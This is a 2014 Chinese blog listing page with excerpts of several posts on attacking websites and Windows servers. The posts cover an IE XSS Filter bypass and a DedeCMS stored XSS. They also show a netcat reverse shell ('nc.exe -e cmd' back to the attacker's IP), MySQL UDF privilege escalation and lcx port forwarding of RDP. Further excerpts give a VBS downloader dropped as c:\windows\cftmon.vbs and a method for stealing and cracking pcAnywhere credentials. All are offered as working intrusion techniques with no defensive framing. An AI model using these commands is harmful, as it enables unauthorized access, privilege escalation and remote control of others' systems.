2014年3月15日
摘要: 反射xss利用方法,绕过IE XSS Filter假设 1.php页面代码如下:echo $_GET['str'];使用IE浏览器访问该页面1.php?str=由于xss filter渲染 导致XSS不成功接下来我们要这么绕过呢?如果该站点 可以发帖、友情链接等等 只要能发链接地址其实不只发链接 嘿嘿。由于IE XSS FILTER 只是检测 referer 是否来自本源,如果来自本源 则 Ie XSS FILTER则不生效。你现在明白了吧在javascript: date: 等协议无效的情况下:">求友情链接IE用户点击即可中招(其他部分浏览器也中招) 阅读全文
posted @ 2014-03-15 15:41 milantgh 阅读(673) 评论(0) 推荐(0) 编辑
摘要: 由于编辑文章的模板参数 typeid2可控,导致存储XSS发生。dedecms/dede/templets/article_edit.htm页面316-325行代码如下: 文章副栏目: ' style='width:200px;' /> , 'typeid2', '')" alt='选择副栏目' title='选择副栏目' /> 从上面可以看出,变量$channelid 与 $arcRow['typeid2'] 只要可控... 阅读全文
posted @ 2014-03-15 15:37 milantgh 阅读(694) 评论(0) 推荐(0) 编辑
摘要: (一)针对网站程序,不考虑服务器。一、查找注入,注意数据库用户权限和站库是否同服。二、查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台。三、查找上传,一些能上传的页面,比如申请友链、会员头像、和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0、Apache等。四、查找编辑器,比较典型的ewebeditor、fckeditor等等。五、查找phpmyadmin等管理程序,可以尝试弱口令,或者寻找其漏洞。六、百度、谷歌搜索程序公开漏洞。七、猜解文件,如知道某文件为admin_login.php,我们可尝试admin_add.php、admin_ 阅读全文
posted @ 2014-03-15 15:02 milantgh 阅读(1343) 评论(0) 推荐(0) 编辑
摘要: Server-U等都不可以用的情况下. 一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了….1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去2:然后本地执行nc -vv -lp 52进行反弹3:在shell命令下执行F:\wwwroot\img\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.5:直接 阅读全文
posted @ 2014-03-15 14:28 milantgh 阅读(10997) 评论(0) 推荐(0) 编辑
摘要: 一、适用条件 1.目标系统是Windows(Win2000,XP,Win2003); 2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 3.有mysql账号密码 二、导出udf MYSQL 5.1以下版本导出路径 阅读全文
posted @ 2014-03-15 14:10 milantgh 阅读(1409) 评论(0) 推荐(0) 编辑
摘要: cmd:执行命令的载体cmdshelllcx:端口映射工具1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器nc:监听工具A:基本用法1.连接到REMOTE主机格式:nc.exe -nvv 192.168.2.2 80讲解:连到192.168.2.2的TCP80端口2. 阅读全文
posted @ 2014-03-15 14:04 milantgh 阅读(2609) 评论(0) 推荐(1) 编辑
摘要: 1.端口映射解决内网提权步骤:1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器在webshell上执行lcx,实现端口转发:for example:lcx.exe -slave 127.0.0.1 51 192.168.2.2 3389使用工具:cmd.exe lc. 阅读全文
posted @ 2014-03-15 12:54 milantgh 阅读(652) 评论(0) 推荐(0) 编辑
摘要: vbs下载者:011:0203echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs0405echo sGet.Mode = 3 >>c:\windows\cftmon.vbs0607echo sGet.Type = 1 >>c:\windows\cftmon.vbs0809echo sGet.Open() >>c:\windows\cftmon.vbs1011echo sGet.Write(xPost.responseBody) >> 阅读全文
posted @ 2014-03-15 12:25 milantgh 阅读(1308) 评论(0) 推荐(0) 编辑
摘要: 旁站路径问题:1、读网站配置。2、用以下VBS:01On Error Resume Next0203If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then0405MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"0607WScr 阅读全文
posted @ 2014-03-15 12:23 milantgh 阅读(1526) 评论(0) 推荐(0) 编辑
摘要: pcAnywhere提权:1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users用户的目录权限,只剩下administer和system用户目录权限,则无法提权;2.在webshll的大马中查找到pcanywhere目录里的host目录,里面的cif文件保存了连接pcanywhere的账户和密码,然后下载下来,通过PcAnywhere密码破解工具进行破解密码,然后再自己的电脑上安装pcanywhere,然后通过连接到另一台电脑进行远程桌面连接;——————————–利用HASH 阅读全文
posted @ 2014-03-15 11:48 milantgh 阅读(6463) 评论(0) 推荐(0) 编辑